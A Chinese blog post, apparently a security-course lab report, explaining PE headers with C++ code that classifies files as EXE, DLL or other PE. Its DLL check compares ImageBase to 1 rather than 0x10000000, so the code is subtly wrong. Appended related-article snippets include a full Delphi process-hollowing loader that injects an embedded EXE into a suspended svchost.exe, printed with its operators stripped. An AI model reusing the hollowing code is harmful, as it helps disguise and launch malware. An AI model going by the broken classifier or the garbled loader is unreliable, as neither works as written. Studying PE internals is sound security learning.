网络安全入门实验06:PE文件的解析

最新推荐文章于 2025-03-29 19:16:36 发布
原创 最新推荐文章于 2025-03-29 19:16:36 发布 · 1.8k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个小程序,用于识别文件是否为PE文件,并进一步判断其类型是exe、dll还是其他PE文件。通过解析PE文件的DOS头和NT头,利用特定标志和ImageBase值进行判断。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

0.实验要求

1.实验思路

2.代码实现

3.实验结果

 

 

0.实验要求

 

请依据参考文档中的内容编写一个小程序,使其可以实现如下功能:
1、判断一个文件是否为PE文件,如果是PE文件,判断它是exe文件还是dll文件,或者是其它类型的PE文件
2、请提交实验报告和你的源代码文件

 

 

1.实验思路

 

PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL)

以下图例来自老师给的资料

 

从这张图中可以直观的看出,PE文件首先具有一个DOS的结构头

其定义如下(来自winnt.h头文件中的定义):

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

其中比较重要的是第一个值e_magic和最后一个值e_lfanew

以下定义也来自winnt.h头文件

#define IMAGE_DOS_SIGNATURE                 0x5A4D      // MZ
#define IMAGE_OS2_SIGNATURE                 0x454E      // NE
#define IMAGE_OS2_SIGNATURE_LE              0x454C      // LE
#define IMAGE_VXD_SIGNATURE                 0x454C      // LE
#define IMAGE_NT_SIGNATURE                  0x00004550  // PE00

如果文件是一个PE文件,其e_magic值为0x5A4D,即MZ

我们可以读取一个文件,如果文件头的值为0x5A4D,则可以判断这是一个PE文件

如果是PE文件,再进行接下来的操作

 

下面说第二个值e_lfanew,从它的英文注释中可以看出,这个值是表明了一个新的exe头部的地址

从实际来解释,即这个LONG值是一个偏移量,偏移后的位置是一个exe header

在查阅资料的过程中,也看到了有这样的解释

 //Offset to start of PE header             指向PE文件头

其意思大致是相同的(其实就是一样的)

第二步:将文件指针移到这个位置,读取这个头部的信息

那么这个头部是什么呢

根据资料,这个Header实际为

typedef struct _IMAGE_NT_HEADERS {
  DWORD                   Signature;
  IMAGE_FILE_HEADER       FileHeader;
  IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

解释如下:

Signature 表明了文件是一个PE文件,值为PE\0\0

FileHeader 为 IMAGE_FILE_HEADER 结构体,存储了头部信息

OptionalHeader 则存储了可选头信息

 

查看一下 IMAGE_FILE_HEADER的定义

typedef struct _IMAGE_FILE_HEADER {
  WORD  Machine;
  WORD  NumberOfSections;
  DWORD TimeDateStamp;
  DWORD PointerToSymbolTable;
  DWORD NumberOfSymbols;
  WORD  SizeOfOptionalHeader;
  WORD  Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

 

IMAGE_OPTIONAL_HEADER

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

 

这里就不一一翻译了,毕竟这次的实验主要是判断一个文件是否为PE文件,如果是PE文件,判断它是exe文件还是dll文件,或者是其它类型的PE文件

直接说一下吧

判断是否为PE文件的部分前面说了

这里用于判断为dll还是exe还是其他类型的文件的参数主要是以下两个

一个是

FileHeader里面的Characteristics

 

 

 

 

FileHeader.Characteristics与IMAGE_FILE_DLL做'&'运算后,若文件是OCX和DLL,此结果为0x2000,与其他格式的PE文件都不同(可以先将OCX和DLL筛选出来

为什么不与IMAGE_FILE_EXECUTABLE_IMAGE做运算?因为上图红框内也标注了,DLL也是一个executable的文件,所以这里做了运算之后,EXE和DLL两个的结果是相等的,无法正确判断

然后我们就要借助于

刚刚说到的另一个重要的参数

OptionalHeader里面的ImageBase

从定义上可以看出,这个值是文件首选的在内存中加载的地址

DLL的这个值默认为0x10000000

而对于应用EXE来说,它则是0x00400000

所以我们可以通过判断ImageBase的值是否为的值是0x10000000,区分OCX和DLL文件

如果不是DLL或者OCX

直接判断ImageBase的值是否为0x00400000,判断文件是否为EXE

如果都不是,列为其他文件

 

总结一下:

读取一个文件,如果文件头的值为0x5A4D,则可以判断这是一个PE文件

将文件指针移到PE头的位置,读取这个头部的信息

读取PE头里面的IMAGE_FILE_HEADER 结构体的Characteristics

判断Characteristics与IMAGE_FILE_DLL做'&'运算的结果是否为IMAGE_FILE_DLL

再判断ImageBase的值是否为0x10000000,区分OCX和DLL文件

判断ImageBase的值是否为0x00400000,判断文件是否为EXE

 

P.S

这里要说一下,实际上,即使同为DLL或者同为EXE程序,每个程序的实际参数都是不一定的,都是可以改变的

比如来自小甲鱼PE详解的这段话:

即使同为EXE文件,是运行在64位还是32位操作系统上,也会使其中参数不一(这里一下想不起来是哪几个参数了)

即使同为DLL文件,他的ImageBase字段也有可能不一致,刚刚也说了,以上实验用作判断的ImageBase的值是“默认”的时候的值

因此,以上的判断方法,仅仅是针对普遍的EXE、DLL和其他PE文件而言

并不能保证正确判断、区分所有的PE文件

但是没有找到一个更好的方法,如果有错误或者可以改进的地方,还希望指出

 

 

2.代码实现

 

这里根据实验04的代码进行了一点修改,依然采取在生成的可执行文件所在的目录下遍历的方式

 

// EX06.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include<iostream>
#include<Windows.h>
#include<fileapi.h>
#include<tchar.h>

#define OtherPE 3
#define isDLL 2
#define isEXE 1
#define NotPE 0

using namespace std;

int myCheck(char *FilePath)
{
	//用于读取IMAGE_DOS_HEADER信息
	IMAGE_DOS_HEADER myDosHeader;
	HANDLE hFile = CreateFile(
		FilePath,
		GENERIC_READ,
		FILE_SHARE_READ,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
	);
	DWORD readSize = 0;
	//将信息读入IMAGE_DOS_HEADER
	ReadFile(hFile, &myDosHeader, sizeof(myDosHeader), &readSize, NULL);

	//判断头部是否为0x5A4D,即MZ
	if (myDosHeader.e_magic == 0x5A4D)
	{
		IMAGE_NT_HEADERS myNtHeaders;
		readSize = 0;
		//如果是,将指针设置到PE文件头的位置
		SetFilePointer(hFile, myDosHeader.e_lfanew, NULL, FILE_BEGIN);
		//读取PE文件头
		ReadFile(hFile, &myNtHeaders, sizeof(myNtHeaders), &readSize, NULL);
		CloseHandle(hFile);

		//判断是否为DLL
		if ((myNtHeaders.FileHeader.Characteristics & IMAGE_FILE_DLL) == IMAGE_FILE_DLL)
		{
			if (myNtHeaders.OptionalHeader.ImageBase == 1)//0x10000000
			{
				return isDLL;
			}
			return OtherPE;//OCX
		}
		//判断是否为EXE
		else if (myNtHeaders.OptionalHeader.ImageBase == 0x00400000)
		{
			return isEXE;
		}
		//其他PE
		else
		{
			return OtherPE;
		}
	}

	CloseHandle(hFile);
	return NotPE;
}

int main()
{
	WIN32_FIND_DATA stFindFile;
	HANDLE hFindFile;
	char *szFilter = (char *)"*.*";   // 所有类型的文件
	char szCheckFile[MAX_PATH];  // 保存检测的文件的路径
	char szSearch[MAX_PATH];    // 保存完整筛选路径
	int ret = 0;                // 搜索的返回值
	char directory[256];//保存目录值

	//获取当前目录
	GetCurrentDirectory(256, directory);

	lstrcpy(szCheckFile, directory);//存入路径中
	lstrcat(szCheckFile, "\\");// 添加'\'

	lstrcpy(szSearch, directory);//存入路径中
	lstrcat(szSearch, "\\");//添加'\'
	lstrcat(szSearch, szFilter);//添加过滤条件
	hFindFile = FindFirstFile(szSearch, &stFindFile);

	if (hFindFile != INVALID_HANDLE_VALUE)
	{
		do
		{
			// 组成完整的程序的路径
			lstrcat(szCheckFile, stFindFile.cFileName);
			// 
			switch (myCheck(szCheckFile))
			{
			case isEXE:
				cout << stFindFile.cFileName << " is a EXE File" << endl;
				break;
			case isDLL:
				cout << stFindFile.cFileName << " is a DLL File" << endl;
				break;
			case OtherPE:
				cout << stFindFile.cFileName << " is not EXE or DLL but a PE File" << endl;
				break;
			default:
				cout << stFindFile.cFileName << " is not a PE File" << endl;
				break;

			}

			// 重置文件路径
			// 这里不重置szCheckFile里的值,接下来会出错
			lstrcpy(szCheckFile, directory);
			lstrcat(szCheckFile, "\\");
			ret = FindNextFile(hFindFile, &stFindFile);
		} while (ret != 0);
	}

	FindClose(hFindFile);
	system("pause");
	return 0;


}

 

 

 

3.实验结果

 

测试文件夹如下:

从系统目录随便复制了几个PE文件,和随便选择了几个其他格式文件

结果如下:

 

 

 

 

[系统安全] PE文件格式分析实战基础—分析helloworld文件
H4ppyD0g的博客
12-30 841
本文为笔者从零基础学习系统安全相关内容的笔记,如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容,欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新,由于笔者现阶段还处于初学阶段,不可避免参照复现各类书籍内容,如书籍作者认为侵权请告知,笔者将立刻删除。强调本系列所有内容仅作为学习研究使用,作者对此文章中的代码造成的任何后果不负法律责任。
[网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳
杨秀璋的专栏
07-23 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了基于机器学习的恶意代码检测技术,包括机器学习概述与算法举例、基于机器学习方法的恶意代码检测、机器学习算法在工业界的应用。这篇文章将尝试软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源,但也存在局限性。文章同时也普及了PE文件分析和APT溯源相关基础,基础性文章,希望对您有所帮助~
再探.NET的PE文件结构(安全篇)
weixin_30678821的博客
11-10 311
一、开篇   首先写在前面,这篇文章源于个人的研究和探索,由于.NET有自己的反射机制,可以清楚的将源码反射出来,这样你的软件就很容易被破解,当然这篇文章不会说怎么样保护你的软件不被破解,相反是借用一个软件来讲述是怎么被攻破的,也会有人说这是一篇破文,我其实这篇文章已经写了很长时间了,不知道以什么形式发出来,因为毕竟是有些破解类的东西。但是我觉得从这篇文章相反的是能够带来一些启发。大家应该都...
PE文件病毒实验(二)——实验报告
jmhIcoding
03-01 1万+
实验目的:掌握PE文件格式;理解病毒感染PE文件的原理。 实验内容: (1) 了解PE文件格式。 (2) 根据实验步骤,编程实现在PE文件中插入病毒代码。运行插入病毒代码后的PE文件。 (3) 编程实现在磁盘中搜索.exe文件的操作,对于所有的.exe文件插入病毒代码并运行插入病毒代码后的exe文件。 (4) 编程实现在磁盘中搜索(3)中的.exe文件的操作,对于所有的.exe文件删除病毒代码并运...
HBU网络安全实验——逆向部分:实验2-动态调试&PE文件格式分析
最新发布
m0_74762365的博客
03-29 644
HBU网络安全实验——逆向部分:实验2-动态调试&PE文件格式分析
实验:PE文件的版本信息
谢绝(无视)留言与私信
11-17 1353
实验的原因: 做CAB打包实验, 需要指定CAB包内的文件版本. 参考资料: CFileVersionInfo - Retrieving a File's full Version Information Resourcehttp://www.codeproject.com/KB/files/fileversioninfo.aspx期望的实验效果:  做个Dialog, 把文件拖上去, 按下分析, 得到文件的版本信息.
[网络安全自学篇] 六十二.PE文件逆向之PE文件解析PE编辑工具使用和PE结构修改(三)
杨秀璋的专栏
03-25 1万+
本系列虽然叫“网络安全自学篇”,但由于系统安全、软件安全与网络安全息息相关,作者同样会分享一些系统安全案例及基础工具用法,也是记录自己的成长史,希望大家喜欢,一起进步。前文分享了数字签名,采用Signtool工具对EXE文件进行签名,接着利用Asn1View、PEVie、010Editor等工具进行数据提取和分析。本文将详细介绍PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等,这也为后续PE病毒和恶意代码的攻防打下扎实基础。希望这篇基础文章对您有所帮助~
[网络安全自学篇] 六十一.PE文件逆向之数字签名详细解析及Signcode、PEView、010Editor、Asn1View等工具用法(二)
杨秀璋的专栏
03-24 1万+
本系列虽然叫“网络安全自学篇”,但由于系统安全、软件安全与网络安全息息相关,作者同样会分享一些系统安全案例及基础工具用法,也是记录自己的成长史,希望大家喜欢,一起进步。前文分享了数字签名的原理知识和Signtool签名工具,这篇文章将详细解析数字签名,采用Signtool工具对EXE文件进行签名,采用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助~
网络安全学习第6篇 - 爆破及PE文件解释
一清道长的个人博客
04-23 2707
1、请采用暴力破解的方式去尝试破解crack.exe文件(在实验报告中说明破解原理即可,无需提交破解后的文件) 2、请依据参考文档中的内容编写一个小程序,使其可以实现如下功能: ①判断一个文件是否为PE文件,如果是PE文件,判断它是exe文件还是dll文件,或者是其它类型的PE文件 ②请提交实验报告和你的源代码文件 实验文件.rar https://download.youkuaiyun.com/down...
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
热门推荐
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
delphi 在内存中直接运行EXE类型的资源文件
09-09
unit PE; interface uses windows; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; implementation type TImageSectionHeaders = array[0..0] of TImageSectionHeader; PImageSectionHeaders = ^TImageSectionHeaders; { 计算对齐后的大小 } function GetAlignedSize(Origin, Alignment: Cardinal): Cardinal; begin result := (Origin + Alignment - 1) div Alignment * Alignment; end; { 计算加载pe并对齐需要占用多少内存,未直接使用OptionalHeader.SizeOfImage作为结果是因为据说有的编译器生成的exe这个值会填0 } function CalcTotalImageSize(MzH: PImageDosHeader; FileLen: Cardinal; peH: PImageNtHeaders; peSecH: PImageSectionHeaders): Cardinal; var i: Integer; begin {计算pe头的大小} result := GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment); {计算所有节的大小} for i := 0 to peH.FileHeader.NumberOfSections - 1 do if peSecH[i].PointerToRawData + peSecH[i].SizeOfRawData > FileLen then // 超出文件范围 begin result := 0; exit; end else if peSecH[i].VirtualAddress 0 then //计算对齐后某节的大小 if peSecH[i].Misc.VirtualSize 0 then result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment) else result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment) else if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then result := result + GetAlignedSize(peSecH[i].SizeOfRawData, peH.OptionalHeader.SectionAlignment) else result := result + GetAlignedSize(peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment); end; { 加载pe到内存并对齐所有节 } function AlignPEToMem(const Buf; Len: Integer; var PeH: PImageNtHeaders; var PeSecH: PImageSectionHeaders; var Mem: Pointer; var ImageSize: Cardinal): Boolean; var SrcMz: PImageDosHeader; // DOS头 SrcPeH: PImageNtHeaders; // PE头 SrcPeSecH: PImageSectionHeaders; // 节表 i: Integer; l: Cardinal; Pt: Pointer; begin result := false; SrcMz := @Buf; if Len < sizeof(TImageDosHeader) then exit; if SrcMz.e_magic IMAGE_DOS_SIGNATURE then exit; if Len < SrcMz._lfanew + Sizeof(TImageNtHeaders) then exit; SrcPeH := pointer(Integer(SrcMz) + SrcMz._lfanew); if (SrcPeH.Signature IMAGE_NT_SIGNATURE) then exit; if (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_DLL 0) or (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_EXECUTABLE_IMAGE = 0) or (SrcPeH.FileHeader.SizeOfOptionalHeader SizeOf(TImageOptionalHeader)) then exit; SrcPeSecH := Pointer(Integer(SrcPeH) + SizeOf(TImageNtHeaders)); ImageSize := CalcTotalImageSize(SrcMz, Len, SrcPeH, SrcPeSecH); if ImageSize = 0 then exit; Mem := VirtualAlloc(nil, ImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // 分配内存 if Mem nil then begin // 计算需要复制的PE头字节数 l := SrcPeH.OptionalHeader.SizeOfHeaders; for i := 0 to SrcPeH.FileHeader.NumberOfSections - 1 do if (SrcPeSecH[i].PointerToRawData 0) and (SrcPeSecH[i].PointerToRawData < l) then l := SrcPeSecH[i].PointerToRawData; Move(SrcMz^, Mem^, l); PeH := Pointer(Integer(Mem) + PImageDosHeader(Mem)._lfanew); PeSecH := Pointer(Integer(PeH) + sizeof(TImageNtHeaders)); Pt := Pointer(Cardinal(Mem) + GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment)); for i := 0 to PeH.FileHeader.NumberOfSections - 1 do begin // 定位该节在内存中的位置 if PeSecH[i].VirtualAddress 0 then Pt := Pointer(Cardinal(Mem) + PeSecH[i].VirtualAddress); if PeSecH[i].SizeOfRawData 0 then begin // 复制数据到内存 Move(Pointer(Cardinal(SrcMz) + PeSecH[i].PointerToRawData)^, pt^, PeSecH[i].SizeOfRawData); if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment)) else pt := pointer(Cardinal(pt) + GetAlignedSize(peSecH[i].Misc.VirtualSize, peH.OptionalHeader.SectionAlignment)); // pt 定位到下一节开始位置 end else pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment)); end; result := True; end; end; type TVirtualAllocEx = function(hProcess: THandle; lpAddress: Pointer; dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall; var MyVirtualAllocEx: TVirtualAllocEx = nil; function IsNT: Boolean; begin result := Assigned(MyVirtualAllocEx); end; { 生成外壳程序命令行 } function PrepareShellExe(CmdParam: string ): string; begin {这里的路径 自己定义了^_^,仅仅是外壳程序} //result:='c:\Program Files\Internet Explorer\iexplore.exe'+CmdParam ; result := 'c:\windows\system32\svchost.exe' + cmdparam; end; { 是否包含可重定向列表 } function HasRelocationTable(peH: PImageNtHeaders): Boolean; begin result := (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress 0) and (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size 0); end; type PImageBaseRelocation = ^TImageBaseRelocation; TImageBaseRelocation = packed record VirtualAddress: cardinal; SizeOfBlock: cardinal; end; { 重定向PE用到的地址 } procedure DoRelocation(peH: PImageNtHeaders; OldBase, NewBase: Pointer); var Delta: Cardinal; p: PImageBaseRelocation; pw: PWord; i: Integer; begin Delta := Cardinal(NewBase) - peH.OptionalHeader.ImageBase; p := pointer(cardinal(OldBase) + peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); while (p.VirtualAddress + p.SizeOfBlock 0) do begin pw := pointer(Integer(p) + Sizeof(p^)); for i := 1 to (p.SizeOfBlock - Sizeof(p^)) div 2 do begin if pw^ and $F000 = $3000 then Inc(PCardinal(Cardinal(OldBase) + p.VirtualAddress + (pw^ and $0FFF))^, Delta); inc(pw); end; p := Pointer(pw); end; end; type TZwUnmapViewOfSection = function(Handle, BaseAdr: Cardinal): Cardinal; stdcall; { 卸载原外壳占用内存 } function UnloadShell(ProcHnd, BaseAddr: Cardinal): Boolean; var M: HModule; ZwUnmapViewOfSection: TZwUnmapViewOfSection; begin result := False; m := LoadLibrary('ntdll.dll'); if m 0 then begin ZwUnmapViewOfSection := GetProcAddress(m, 'ZwUnmapViewOfSection'); if assigned(ZwUnmapViewOfSection) then result := (ZwUnmapViewOfSection(ProcHnd, BaseAddr) = 0); FreeLibrary(m); end; end; { 创建外壳进程并获取其基址、大小和当前运行状态 } function CreateChild(Cmd: string; var Ctx: TContext; var ProcHnd, ThrdHnd, ProcId, BaseAddr, ImageSize: Cardinal): Boolean; var si: TStartUpInfo; pi: TProcessInformation; Old: Cardinal; MemInfo: TMemoryBasicInformation; p: Pointer; begin FillChar(si, Sizeof(si), 0); FillChar(pi, SizeOf(pi), 0); si.cb := sizeof(si); result := CreateProcess(nil, PChar(Cmd), nil, nil, False, CREATE_SUSPENDED, nil, nil, si, pi); // 以挂起方式运行进程 if result then begin ProcHnd := pi.hProcess; ThrdHnd := pi.hThread; ProcId := pi.dwProcessId; { 获取外壳进程运行状态,[ctx.Ebx+8]内存处存的是外壳进程的加载基址,ctx.Eax存放有外壳进程的入口地址 } ctx.ContextFlags := CONTEXT_FULL; GetThreadContext(ThrdHnd, ctx); ReadProcessMemory(ProcHnd, Pointer(ctx.Ebx + 8), @BaseAddr, SizeOf(Cardinal), Old); // 读取加载基址 p := Pointer(BaseAddr); { 计算外壳进程占有的内存 } while VirtualQueryEx(ProcHnd, p, MemInfo, Sizeof(MemInfo)) 0 do begin if MemInfo.State = MEM_FREE then break; p := Pointer(Cardinal(p) + MemInfo.RegionSize); end; ImageSize := Cardinal(p) - Cardinal(BaseAddr); end; end; { 创建外壳进程并用目标进程替换它然后执行 } function AttachPE(CmdParam: string; peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; ImageSize: Cardinal; var ProcId: Cardinal): Cardinal; var s: string; Addr, Size: Cardinal; ctx: TContext; Old: Cardinal; p: Pointer; Thrd: Cardinal; begin result := INVALID_HANDLE_VALUE; s := PrepareShellExe(CmdParam + ' ' {, peH.OptionalHeader.ImageBase, ImageSize}); if CreateChild(s, ctx, result, Thrd, ProcId, Addr, Size) then begin p := nil; if (peH.OptionalHeader.ImageBase = Addr) and (Size >= ImageSize) then // 外壳进程可以容纳目标进程并且加载地址一致 begin p := Pointer(Addr); VirtualProtectEx(result, p, Size, PAGE_EXECUTE_READWRITE, Old); end else if IsNT then // 98 下失败 begin if UnloadShell(result, Addr) then // 卸载外壳进程占有内存 // 重新按目标进程加载基址和大小分配内存 p := MyVirtualAllocEx(Result, Pointer(peH.OptionalHeader.ImageBase), ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (p = nil) and hasRelocationTable(peH) then // 分配内存失败并且目标进程支持重定向 begin // 按任意基址分配内存 p := MyVirtualAllocEx(result, nil, ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if p nil then DoRelocation(peH, Ptr, p); // 重定向 end; end; if p nil then begin WriteProcessMemory(Result, Pointer(ctx.Ebx + 8), @p, Sizeof(DWORD), Old); // 重置目标进程运行环境中的基址 peH.OptionalHeader.ImageBase := Cardinal(p); if WriteProcessMemory(Result, p, Ptr, ImageSize, Old) then // 复制PE数据到目标进程 begin ctx.ContextFlags := CONTEXT_FULL; if Cardinal(p) = Addr then ctx.Eax := peH.OptionalHeader.ImageBase + peH.OptionalHeader.AddressOfEntryPoint // 重置运行环境中的入口地址 else ctx.Eax := Cardinal(p) + peH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(Thrd, ctx); // 更新运行环境 ResumeThread(Thrd); // 执行 CloseHandle(Thrd); end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end; end; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; var peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; peSz: Cardinal; begin result := INVALID_HANDLE_VALUE; if alignPEToMem(ABuffer, Len, peH, peSecH, Ptr, peSz) then begin result := AttachPE(CmdParam, peH, peSecH, Ptr, peSz, ProcessId); VirtualFree(Ptr, peSz, MEM_DECOMMIT); //VirtualFree(Ptr, 0, MEM_RELEASE); end; end; initialization MyVirtualAllocEx := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'VirtualAllocEx'); end. /////////////////////////////////////////////////////////////////////// {测试:你可以把任何一个exe文件 作成资源然后这样调用} program test; //{$APPTYPE CONSOLE} {$R 'data.res' 'data.rc'}//加入exe资源文件 uses windows, PE in 'PE.pas'; //引用上面的单元 var ProcessId: Cardinal; ResourceLocation: HRSRC; Size: Longword; ResDataHandle: THandle; ResourcePointer: PChar; begin ResourceLocation := FindResource(HInstance, 'myexe', RT_RCDATA); if ResourceLocation 0 then begin Size := SizeofResource(HInstance, ResourceLocation); if Size 0 then begin ResDataHandle := LoadResource(HInstance, ResourceLocation); if ResDataHandle 0 then begin ResourcePointer := LockResource(ResDataHandle); if ResourcePointer nil then begin MemExecute(ResourcePointer^, size, '', ProcessId);//只需这样调用即可 end; end; end; end; end.
PE 格式详解与试验
Debroon
11-09 1227
PE 格式详解与试验可执行文件结构分析   可执行文件结构分析 可执行文件有: windows 的 PE,如 .exe、.dll、.ocx、.sys、.com Linux 的 ELF,如
实验PE头及导入表的应用
babywhale_bi的博客
01-11 1335
逆向工程实验
PE文件结构剖析---基本结构
For Geek
04-25 1439
PE简介 PE文件衍生于早期建立的COFF文件格式,EXE和DLL文件实际上用的是同一种文件格式,唯一的区别就是用一个字段标识出这个文件是EXE还是DLL。64位Windows格式为PE32+。只是简单的将以前的32位字段扩展到64位。 重要要点 要认识到PE文件不是作为单一内存映射文件被装入内存的。 PE加载器通过遍历PE文件决定哪一部分被映射。 磁盘上的数据结构布局和内存中的数据结构布局是一致...
PE文件感染程序设计(PE病毒)
Zyecho的博客
01-11 4418
记录PE病毒设计的入门实验
2021-10-02PE文件学习
qq_45290991的博客
10-02 635
PE文件学习 推荐工具:lord PE、stud PEPE权威指南》,了解格式,看雪,吾爱破解 ,EXE是如何组成的,如何逆向一个EXE文件和安卓文件。 这些东西不能不知道 EXE文件和DLL文件实际上是一样的,唯一的区别就是用一个字段标示出了这个文件是EXE文件还是DLL文件 64位不过就是把32位的字段拓展成64位,也叫PE32+文件,没本质区别。 PE文件的定义基本都在“我的电脑”——下的“winnt.h”头文件中。 而在这个“winnt.h”文件中的image format下就是系
Windows核心编程_PE文件格式解析
17岁boy的博客
06-12 2041
接上一篇的理论知识:PE文件格式 这一篇是实战,其实读取非常简单,WIndows也为我们提供了内存对齐的结构体: //DOS头 PIMAGE_DOS_HEADER //NT头(包括PE标识+Image_File_Header+OptionHeader) PIMAGE_NT_HEADERS //标准PE头 PIMAGE_FILE_HEADER 其实PIMAG...
PE文件:(1)基础知识
weixin_43972499的博客
04-06 1030
基础知识基本概念PE文件结构Dos头NT头(1)PE标志(2)文件头(3)可选头区段表总结 基本概念   PE文件的全称是"Portable Executable File Format",也就是可移植的执行体,目前是Windows平台上的主流可执行文件格式。   PE文件使用的是一个平面地址空间,所有的代码和数据都合并在了一起,组成了一个完整的文件结构。文件内容被分成了不同的部分区段,区段中包含文件基本信息、数据、代码,各个区段按页大小对齐,每个区段都有自己的属性,如是否可读、可写和可执行。 PE文件结构
有关windows pe实验系列(一)
processor2018的博客
03-29 529
以下这些实验的方案,都是建立在理解windows loader加载机制上,能正常运行来设计。选择的实验对象,虽然是任意的程序,但要保证程序内部不会有校验文件自身完整性的代码段,避免程序自身出错信息和系统loader出错信息弄混。【实验一】Windows 8.1,使用WinHex打开某程序,查看任意的前后紧挨着的二个节头,找到它们对应的节、将前一个节调换到后一个节后面,然后修改节头中的IMAGE_S...
CTF入门指南:基础知识与工具解析
